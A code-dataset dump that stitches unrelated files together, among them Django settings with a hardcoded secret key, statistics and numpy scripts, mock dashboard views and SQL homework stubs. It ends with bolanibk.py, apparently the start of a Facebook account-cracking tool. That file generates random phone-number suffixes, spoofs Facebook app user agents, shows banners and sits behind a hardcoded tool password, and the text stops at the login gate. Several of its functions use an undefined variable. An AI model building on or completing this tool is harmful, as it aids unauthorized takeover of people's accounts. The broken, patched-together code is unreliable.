b77ad03480bc81b18e350b51cbe4444a9fec7337
|
/settings.py
|
57bfb869d2b4bc04c7cc13d2342e4dbd200aafde
|
[] |
no_license
|
sandin/gorder
|
bf796de855deea782963b96269854633e0c67694
|
ad02405a837041834807fef747bb401bb4a82215
|
refs/heads/master
| 2021-01-01T20:01:22.288264
| 2011-12-04T13:34:27
| 2011-12-04T13:34:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,295
|
py
|
# Django settings for gorder project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('lds', 'lds2012@gmail.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'orders.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'cn-zh' #'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
'static',
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '2-^_25i3wxb4laa@gtw9&44q#14$ydb!c2$a@y)c%4h12@678$'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.csrf.CsrfResponseMiddleware',#
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'gorder.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
'templates',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
'django.contrib.admindocs',
'gorder.order',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
[
"lds2012@gmail.com"
] |
lds2012@gmail.com
|
aff49cb5a5763b1535e50355ec3ecf7c18264129
|
280b630786effa123cbf6a47b9e39504b2b5125c
|
/RentItProject/urls.py
|
5606d8ad368680987a6d658428ac1f52ada2ee49
|
[] |
no_license
|
prashantsarvi/Rent-It
|
a8a226f916272b5597b6adc564965e8489203cb8
|
3bbc8607e6fcee5c0932c394184e62e644d4d461
|
refs/heads/master
| 2023-04-19T13:31:00.062111
| 2021-05-06T19:23:26
| 2021-05-06T19:23:26
| 365,012,039
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 827
|
py
|
"""RentItProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('', include('RentItApp.urls')),
path('admin/', admin.site.urls),
]
|
[
"pr486824@dal.ca"
] |
pr486824@dal.ca
|
90cb4cd25ed3faf8b8f6baadbc1e1813a83e2bc1
|
e151179c85055772136812611e0c1411efc50196
|
/statistics/wine_quality.py
|
63fd38b5d18281de6469efc00a28e4954e6db45e
|
[] |
no_license
|
nutllwhy/AnalyticsWithPython
|
82f3f067da71f56e32934f127539493193402719
|
97e90c7104e7fd0af3c1d6e388ef05208a1337c9
|
refs/heads/master
| 2020-03-08T16:01:45.528987
| 2018-09-15T13:55:28
| 2018-09-15T13:55:28
| 128,228,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,552
|
py
|
#!/usr/bin/env python3
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import statsmodels.api as sm
import statsmodels.formula.api as smf
from statsmodels.formula.api import ols, glm
# 将数据集读入到pandas数据框中
wine = pd.read_csv('winequality-both.csv', sep=',', header=0)
wine.columns = wine.columns.str.replace(' ', '_')
print(wine.head())
# 显示所有变量的描述性统计量
print(wine.describe())
# 找出唯一值
print(sorted(wine.quality.unique()))
# 计算值的频率
print(wine.quality.value_counts())
# 按照葡萄酒类型显示质量的描述性统计量
print(wine.groupby('type')[['quality']].describe().unstack('type'))
# 按照葡萄酒类型显示质量的特定分位数值
print(wine.groupby('type')[['quality']].quantile([0.25, 0.75]).unstack('type'))
# 按照葡萄酒类型查看质量分布
red_wine = wine.loc[wine['type']=='red', 'quality']
white_wine = wine.loc[wine['type']=='white', 'quality']
sns.set_style("dark")
print(sns.distplot(red_wine, norm_hist=True, kde=False, color="red", label="Red wine"))
print(sns.distplot(white_wine, norm_hist=True,kde=False, color="white", label="White wine"))
sns.axlabel("Quality Score", "Density")
plt.title("Distribution of Quality by Wine Type")
plt.legend()
plt.show()
# 检验红葡萄酒和白葡萄酒的平均质量是否有所不同
print(wine.groupby(['type'])[['quality']].agg(['std']))
tstat, pvalue, df = sm.stats.ttest_ind(red_wine, white_wine)
print('tstat: %.3f pvalue: %.4f' % (tstat, pvalue))
|
[
"linli0301@hotmail.com"
] |
linli0301@hotmail.com
|
ea8962ba60699d46c6b69a51c50e08e598b86af8
|
c8763aa1d1c2d7c3b965b34d8194487d23b428ed
|
/examples/t4.py
|
b8b9c1e255f4a2f4248f2225b8326fdf6ba9535b
|
[] |
no_license
|
thiagodeschamps/numpy-examples
|
67b260c7fac9d9bf78e296180adabfea75570a25
|
8c7a6f943dcb313ac2fda315de50108af24e5e39
|
refs/heads/master
| 2020-04-24T02:21:13.160740
| 2019-02-20T08:55:06
| 2019-02-20T08:55:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 315
|
py
|
import numpy as np
# matrix in normal python
L = [[1,2],[3,4]]
# arrays in numpy
M = np.array([[1,2],[3,4]])
# ways to acces the elements
print(M[0][0]) # 1
# OR
print(M[0,0]) # 1
# Matrix in numpy
M2 = np.matrix([[1,2], [3,4]])
# transforming matrix to array
A = np.array(M2)
# transpose
print(A.T)
|
[
"thiago.quantic@gmail.com"
] |
thiago.quantic@gmail.com
|
13256a1305bc92d889889c80eb8f95d586c9105a
|
927ef3729007145f50b16d8c124311ef04e62e7b
|
/groups/audio/aic/files.spec
|
399b44a6d09ea978c33f908667c46eba4c91827b
|
[
"Apache-2.0"
] |
permissive
|
projectceladon/device-androidia-mixins
|
ac08f733fee596aa9104c6be18142d4d695dbbcc
|
c2a83f0851ae39c6b502a767a0afa92647c9e73e
|
refs/heads/master
| 2023-08-31T18:47:05.779552
| 2023-07-31T04:00:23
| 2023-08-01T18:57:08
| 127,978,152
| 15
| 675
|
NOASSERTION
| 2023-09-14T15:05:51
| 2018-04-03T22:58:00
|
Makefile
|
UTF-8
|
Python
| false
| false
| 27
|
spec
|
[devicefiles]
audiopolicy:
|
[
"41093903+sysopenci@users.noreply.github.com"
] |
41093903+sysopenci@users.noreply.github.com
|
bc1df76fecb356463637a6a45c1d72b1bf9d2477
|
b1dac3171f845fa5294064492ba511171581ea00
|
/backend/tests/test_material.py
|
fe116b0a93afd9dc31a2265ea0cb25576fd95e95
|
[] |
no_license
|
CPBaja/Parts-Management
|
9980753143d961d97a53778c171370a7ebec5084
|
8e36ea0e2517cc3e849a9c3e72a295fad5a128b7
|
refs/heads/main
| 2023-05-08T07:39:59.830050
| 2021-06-02T07:16:36
| 2021-06-02T07:16:36
| 360,948,554
| 0
| 0
| null | 2021-06-02T06:59:18
| 2021-04-23T16:44:30
| null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
import material
def test_material():
material.Material()
material.Aluminum("")
material.CarbonFiber()
material.Steel("")
|
[
"rahulxgoyal@gmail.com"
] |
rahulxgoyal@gmail.com
|
9f5ac27e9159066b298faf38dc4dca9399804529
|
1d38edc479e5804f157abe503e8a2b2f3880641b
|
/Ex010.py
|
a1987748151cd7df31922e953a3f681ce43a69dc
|
[
"MIT"
] |
permissive
|
GabrielSilva2y3d/Curso-em-video-python-exercicios
|
947d5425aaef5ed91d54fceae9826569d6f0a67f
|
1098ccb3f8c21b411e6b6e6dc1c9bb339e80b785
|
refs/heads/main
| 2023-03-04T18:13:06.871965
| 2021-02-20T21:23:02
| 2021-02-20T21:23:02
| 326,793,645
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
print('Conversor de moedas')
reais = float(input('Digite um valor em reais: R$'))
dolar = reais/5.27
print(f'R${reais} equivale a US${dolar:.2f}')
|
[
"74156876+GabrielSilva2y3d@users.noreply.github.com"
] |
74156876+GabrielSilva2y3d@users.noreply.github.com
|
10f8a390e3b42d25c9103a522c1977c4edda5872
|
d50b5f399d092556e1836ceac57a466c74dc9cd0
|
/lantern/relational_database/homework.py
|
599bb16d10e31d6723e10e93cc09e91fe81f1e05
|
[] |
no_license
|
maxiksonik/green_lantern
|
1edf787fc7f29c27f22467155fedd88014b6e238
|
80d6ff8676c5594849940e557a72958dcd01bda2
|
refs/heads/master
| 2021-02-28T17:50:52.983208
| 2020-06-23T14:45:55
| 2020-06-23T14:45:55
| 245,719,512
| 1
| 0
| null | 2020-03-21T20:08:40
| 2020-03-07T23:13:00
|
Python
|
UTF-8
|
Python
| false
| false
| 3,331
|
py
|
from typing import List
def task_1_add_new_record_to_db(con) -> None:
"""
Add a record for a new customer from Singapore
{
'customer_name': 'Thomas',
'contactname': 'David',
'address': 'Some Address',
'city': 'London',
'postalcode': '774',
'country': 'Singapore',
}
Args:
con: psycopg connection
Returns: 92 records
"""
pass
def task_2_list_all_customers(cur) -> list:
"""
Get all records from table Customers
Args:
cur: psycopg cursor
Returns: 91 records
"""
pass
def task_3_list_customers_in_germany(cur) -> list:
"""
List the customers in Germany
Args:
cur: psycopg cursor
Returns: 11 records
"""
pass
def task_4_update_customer(con):
"""
Update first customer's name (Set customername equal to 'Johnny Depp')
Args:
cur: psycopg cursor
Returns: 91 records with updated customer
"""
pass
def task_5_delete_the_last_customer(con) -> None:
"""
Delete the last customer
Args:
con: psycopg connection
"""
pass
def task_6_list_all_supplier_countries(cur) -> list:
"""
List all supplier countries
Args:
cur: psycopg cursor
Returns: 29 records
"""
pass
def task_7_list_supplier_countries_in_desc_order(cur) -> list:
"""
List all supplier countries in descending order
Args:
cur: psycopg cursor
Returns: 29 records in descending order
"""
pass
def task_8_count_customers_by_city(cur):
"""
List the number of customers in each city
Args:
cur: psycopg cursor
Returns: 69 records in descending order
"""
pass
def task_9_count_customers_by_country_with_than_10_customers(cur):
"""
List the number of customers in each country. Only include countries with more than 10 customers.
Args:
cur: psycopg cursor
Returns: 3 records
"""
pass
def task_10_list_first_10_customers(cur):
"""
List first 10 customers from the table
Results: 10 records
"""
pass
def task_11_list_customers_starting_from_11th(cur):
"""
List all customers starting from 11th record
Args:
cur: psycopg cursor
Returns: 11 records
"""
pass
def task_12_list_suppliers_from_specified_countries(cur):
"""
List all suppliers from the USA, UK, OR Japan
Args:
cur: psycopg cursor
Returns: 8 records
"""
pass
def task_13_list_products_from_sweden_suppliers(cur):
"""
List products with suppliers from Sweden.
Args:
cur: psycopg cursor
Returns: 3 records
"""
pass
def task_14_list_products_with_supplier_information(cur):
"""
List all products with supplier information
Args:
cur: psycopg cursor
Returns: 77 records
"""
pass
def task_15_list_customers_with_any_order_or_not(cur):
"""
List all customers, whether they placed any order or not.
Args:
cur: psycopg cursor
Returns: 213 records
"""
pass
def task_16_match_all_customers_and_suppliers_by_country(cur):
"""
Match all customers and suppliers by country
Args:
cur: psycopg cursor
Returns: 194 records
"""
pass
|
[
"illia.sukonnik@made.com"
] |
illia.sukonnik@made.com
|
d669a80e3039438d012723e0ca8e3ac15b34ead2
|
bcc3655afcba1ba7b91afae39590fe4a10dcf88f
|
/utility.py
|
c3cf58db314c3258cdb191d908c063105767429d
|
[
"Apache-2.0"
] |
permissive
|
jcFisk/SE-Team
|
b1553e05052bf0debdde7a528ed8e63dbd79e8b2
|
a732da50486cf0e776d08e96377547e1dfac0b0a
|
refs/heads/master
| 2016-09-06T01:57:16.494366
| 2014-04-24T21:02:23
| 2014-04-24T21:02:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 470
|
py
|
import re
def email_is_valid(email):
if not re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+").match(email):
return False
if not len(re.findall('[a-zA-Z]',email[-1]))>0:
return False
if '@.' in email:
return False
return True
def dictfetchall(cursor, num_rows_to_fetch=1000000000):
"""Returns all rows from a cursor as a dict"""
desc = cursor.description
return [
dict(zip([col[0] for col in desc], row))
for row in cursor.fetchmany(size=num_rows_to_fetch)
]
|
[
"jcfisk@email.uark.edu"
] |
jcfisk@email.uark.edu
|
7e6edf8627af377af964f85386a2907641ae9030
|
7a257480a78598af017a6220ea2b4bad25882630
|
/bin/merge6.py
|
61761914e657357a9a8367038cee245f86d5ae2a
|
[] |
no_license
|
nanchenchen/sims_maf
|
e619b5feaff5f0134518235d78bb383806afb4f6
|
2b0faebd60fb4387366954d3531ac4d9df8c6fc4
|
refs/heads/master
| 2021-01-22T11:20:17.606277
| 2015-04-30T03:29:31
| 2015-04-30T03:29:31
| 34,808,757
| 0
| 0
| null | 2015-04-29T17:46:10
| 2015-04-29T17:46:10
| null |
UTF-8
|
Python
| false
| false
| 1,682
|
py
|
#! /usr/bin/env python
import argparse
import subprocess
if __name__=="__main__":
"""
Merge the u,g,r,i,z,y plots into a 3x2 grid.
Requires pdfjam: http://www2.warwick.ac.uk/fac/sci/statistics/staff/academic-research/firth/software/pdfjam
Can be used with .pdf or .png files, but the output will always be a pdf
examples:
merge6.py ops1_1122_Median_fiveSigmaDepth_i_band_WFD_HEAL_SkyMap.pdf
merge6.py thumb.ops1_1122_Median_fiveSigmaDepth_u_band_all_props_HEAL_SkyMap.png
"""
parser = argparse.ArgumentParser(description="Merge 6 plots into a single pdf")
parser.add_argument("fileBase", type=str, help="filename of one of the files to merge.")
parser.add_argument("-O", "--outfile", type=str, default=None, help="Output filename")
args = parser.parse_args()
fileBase = args.fileBase
if '/' in fileBase:
fileBase = fileBase.split('/')
path = fileBase[:-1]
path = '/'.join(path)+'/'
fileBase = fileBase[-1]
else:
path=''
# Make a list of the 6 files:
filters = ['u','g','r','i','z','y']
for f in filters:
if '_'+f+'_' in fileBase:
fileBase = fileBase.split('_'+f+'_')
fileList = [ path+fileBase[0]+'_'+f+'_'+fileBase[1] for f in filters]
if args.outfile is None:
outfile = fileBase[0]+'_6_'+fileBase[1]
else:
outfile = args.outfile
# can only output pdf files
if outfile[-3:] == 'png':
outfile = outfile[:-3]+'pdf'
callList = ["pdfjoin", "--nup 3x2 ", "--outfile "+outfile]+fileList
command=''
for item in callList: command=command+' '+item
subprocess.call([command], shell=True)
|
[
"yoachim@uw.edu"
] |
yoachim@uw.edu
|
2aed29f99d592a8083b4e4cfa475decfbfc02a34
|
11227d2b6eb421f55006c543e3e0230ce2375250
|
/vsm_client/dashboard/views.py
|
7bdb0edd124345ebb1056313fbed607704186ec7
|
[] |
no_license
|
iansoft/vsm-client
|
ca5c5d46f1bbfc0aba1e4279f0323aee600270d5
|
45116c037c3366bcdfa33b02796cb8d435188b66
|
refs/heads/master
| 2021-01-10T10:12:31.605770
| 2016-04-26T00:27:23
| 2016-04-26T00:27:23
| 53,121,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,350
|
py
|
# _*_ coding: utf-8 _*_
from __future__ import division
import time,datetime
import json
import random
from django.shortcuts import render
from django.http import HttpResponse
from utils.menu import set_menu,set_breadcrumb
from utils.time import get_time_delta
from django.utils.translation import ugettext_lazy as _
def index(request):
menu_list = set_menu("Dashboard","")
function_item = {"name":"", "url":""}
breadcrumb_list = set_breadcrumb("Dashboard","",function_item)
return render(request, 'dashboard/index.html', {"menu_list":menu_list, "breadcrumb_list":breadcrumb_list})
def overview(request, module):
#the response data
data = {}
if module == "summary":
data = summary()
elif module == "disk_capacity":
data = disk_capacity()
elif module == "storage_group":
data = storage_group()
elif module == "pg":
data = pg()
elif module == "server":
pass
elif module == "osd":
data = osd()
elif module == "monitor":
data = monitor()
elif module == "mds":
data = mds()
elif module == "iops":
data = iops()
elif module == "lantency":
data = lantency()
elif module == "bandwidth":
data = bandwidth()
elif module == "cpu":
data = cpu()
return HttpResponse(json.dumps(data))
def summary():
return {
"vsm_version":"v3.0.0",
"ceph_version":"v10.0.4 ",
"install_time":"2015.09.01",
"uptime":now()
}
def disk_capacity():
total = 100;
used = random.randint(60,total)
percent = used / total;
return {
"total":"4G 500MB",
"used":"2G 500MB",
"percent":str(percent) + "%",
"uptime":now(),
"chart":[
{"name":"normal", "value":(total - used)},
{"name":"used", "value":used},
]
}
def storage_group():
percent_data = percent();
return {
"total":percent_data["total"],
"health":percent_data["health"],
"nearfull":percent_data["nearfull"],
"full":percent_data["full"],
"uptime":now(),
"chart":[
{"name":"health", "value":percent_data["health"]},
{"name":"nearfull", "value":percent_data["nearfull"]},
{"name":"full", "value":percent_data["full"]},
]
}
def pg():
total = 100;
active_clean = random.randint(60,total)
not_active_clean = total - active_clean
return {
"total":total,
"active_clean":active_clean,
"not_active_clean":not_active_clean,
"uptime":now(),
"chart":[
{"name":"active_clean", "value":active_clean},
{"name":"not_active_clean", "value":not_active_clean},
]
}
def osd():
total = 100
in_up = random.randint(0,total)
in_down = random.randint(0,(total-in_up))
out_up = random.randint(0,(total-in_up-in_down))
out_down = random.randint(0,(total-in_up-in_down-out_up))
percent_data = percent();
return {
"in_up":in_up,
"in_down":in_down,
"out_up":out_up,
"out_down":out_down,
"epoch":"2.2",
"uptime":now(),
"chart":[
{"name":"health", "value":percent_data["health"]},
{"name":"nearfull", "value":percent_data["nearfull"]},
{"name":"full", "value":percent_data["full"]},
]
}
def monitor():
return {
"probing":random.randint(0,100),
"electing":random.randint(0,100),
"synchronizing":random.randint(0,100),
"leader":random.randint(0,100),
"popen":random.randint(0,100),
"epoch":"2.2",
"uptime":now(),
}
def mds():
return {
"in":random.randint(0,100),
"up":random.randint(0,100),
"stopped":random.randint(0,100),
"failed":random.randint(0,100),
"total":random.randint(0,100),
"metadata":"2.2",
"data":"232.2",
"epoch":"422.2",
"uptime":now(),
}
def iops():
return {
"write":random.randint(0,100),
"read":random.randint(0,100),
"read_write":random.randint(0,100),
"uptime":now(),
}
def lantency():
return {
"write":random.randint(0,100),
"read":random.randint(0,100),
"read_write":random.randint(0,100),
"uptime":now()
}
def bandwidth():
return {
"in":random.randint(0,100),
"out":random.randint(0,100),
"uptime":now()
}
def cpu():
return {
"average":random.randint(0,100),
"max":random.randint(0,100),
"max_host":"192.168.1.%s" % (str(random.randint(1,255))),
"min":random.randint(0,100),
"min_host":"192.168.1.%s" % (str(random.randint(1,255))),
"uptime":now()
}
def percent():
total = 100;
health = random.randint(60,total)
nearfull = random.randint(0,(total-health))
full = total-health-nearfull
return {
"total":total,
"health":health,
"nearfull":nearfull,
"full":full
}
def now():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
|
[
"anziloveanzi@hotmail.com"
] |
anziloveanzi@hotmail.com
|
32e3137189c26433965953a47f5319c110e53457
|
bf8f46d217a0a6e127e470e007ca1f5d54544d60
|
/bolanibk.py
|
ce7fc087be615c8de5121e30e1479c9e20c16735
|
[] |
no_license
|
balochmafia/bolanibk
|
b2050c1cc87c2d79c8b16addf09a6752a154d71e
|
a5b3345b959903c05e4bce0b52360a85819da185
|
refs/heads/main
| 2023-03-08T17:32:54.779311
| 2021-02-22T08:15:53
| 2021-02-22T08:15:53
| 341,125,927
| 0
| 1
| null | 2021-02-23T04:03:34
| 2021-02-22T08:15:03
|
Python
|
UTF-8
|
Python
| false
| false
| 25,523
|
py
|
# Ustad# SIDRA5# Thuglife# Somibro# Gamz#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;91m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
oks = []
id = []
cpb = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;91m\x1b[1;92m░░▄███▄███▄
░░█████████
░░▒▀█████▀░
░░▒░░▀█▀
░░▒░░█░
░░▒░█
░░░█
░░█░░░░███████
░██░░░██▓▓███▓██▒
██░░░█▓▓▓▓▓▓▓█▓████
██░░██▓▓▓(◐)▓█▓█▓█
███▓▓▓█▓▓▓▓▓█▓█▓▓▓▓█
▀██▓▓█░██▓▓▓▓██▓▓▓▓▓█
░▀██▀░░█▓▓▓▓▓▓▓▓▓▓▓▓▓█
░░░░▒░░░█▓▓▓▓▓█▓▓▓▓▓▓█
░░░░▒░░░█▓▓▓▓█▓█▓▓▓▓▓█
░▒░░▒░░░█▓▓▓█▓▓▓█▓▓▓▓█
░▒░░▒░░░█▓▓▓█░░░█▓▓▓█
░▒░░▒░░██▓██░░░██▓▓██
████████████████████████
█▄─▄███─▄▄─█▄─█─▄█▄─▄▄─█
██─██▀█─██─██─█─███─▄█▀█
▀▄▄▄▄▄▀▄▄▄▄▀▀▄▄▄▀▀▄▄▄▄▄▀
\033[1;97m\x1b[1;96m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91m\x1b[1;91mDEVOLPER zulfiqar Baloch
\033[1;94m\x1b[1;94mFACEBOOK Zulfiqar Baloch
\033[1;91m\x1b[1;95mWhatsap Number +923183700115
\x1b[1;94mBOLANI Baloch Zinda Baad
\x1b[1;93m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96m.\x1b[1;92mKING OF BOLANI.
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;92m-\x1b[1;94mKING OF BALOCHISTAN--------------------------------------
"""
####Logo####
logo1 = """
\033[1;91m\x1b[1;94m____________________██████
_________▓▓▓▓____█████████
__ Ƹ̵̡Ӝ̵̨̄Ʒ▓▓▓▓▓=▓____▓=▓▓▓▓▓
__ ▓▓▓_▓▓▓▓░●____●░░▓▓▓▓
_▓▓▓▓_▓▓▓▓▓░░__░░░░▓▓▓▓
_ ▓▓▓▓_▓▓▓▓░░♥__♥░░░▓▓▓
__ ▓▓▓___▓▓░░_____░░░▓▓
▓▓▓▓▓____▓░░_____░░▓
_ ▓▓____ ▒▓▒▓▒___ ████
_______ ▒▓▒▓▒▓▒_ ██████
_______▒▓▒▓▒▓▒ ████████
_____ ▒▓▒▓▒▓▒_██████ ███
_ ___▒▓▒▓▒▓▒__██████ _███
_▓▓X▓▓▓▓▓▓▓__██████_ ███
▓▓_██████▓▓__██████_ ███
▓_███████▓▓__██████_ ███
_████████▓▓__██████ _███
_████████▓▓__▓▓▓▓▓▓_▒▒
_████████▓▓__▓▓▓▓▓▓
_████████▓▓__▓▓▓▓▓▓
__████████▓___▓▓▓▓▓▓
_______▒▒▒▒▒____▓▓▓▓▓▓
_______▒▒▒▒▒ _____▓▓▓▓▓
________▒▒▒▒______▓▓▓▓▓
________█████____█████
_’▀█║────────────▄▄────────────▄──▄_
──█║───────▄─▄─█▄▄█║──────▄▄──█║─█║
──█║───▄▄──█║█║█║─▄║▄──▄║█║─█║█║▄█║
──█║──█║─█║█║█║─▀▀──█║─█║█║─█║─▀─▀
──█║▄║█║─█║─▀───────█║▄█║─▀▀
──▀▀▀──▀▀────────────▀─█║
───────▄▄─▄▄▀▀▄▀▀▄──▀▄▄▀
──────███████───▄▀
──────▀█████▀▀▄▀
────────▀█▀
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96m-\x1b[1;93mThe Credit For This Code Goes To BOLANI..
\033[1;97m
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
"""
logo2 = """
\033[1;91m\x1b[1;93m█▀▀▄ ▒█▀▀▀ ░█▀▀█ ▒█▀▀▄
▒█░▒█ ▒█▀▀▀ ▒█▄▄█ ▒█░▒█
▒█▄▄▀ ▒█▄▄▄ ▒█░▒█ ▒█▄▄▀
\033[1;97m••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••• ..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;94mFACEBOOK-\x1b[1;94mZulfiqar Baloch
\033[1;92mWHATAAPP \x1b[1;93m+923183700115
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96m -\x1b[1;92mking OF BOLANI Pakistan
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;97m----------------------\x1b[1;96mBalochistan Hackers Pakistan--------------------
"""
CorrectUsername = "BOLANI"
CorrectPassword = "GANG"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m\x1b[1;94mTool Username \x1b[1;92m»» \x1b[1;96m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m \x1b[1;91mTool Password \x1b[1;97m» \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;94mWrong Password"
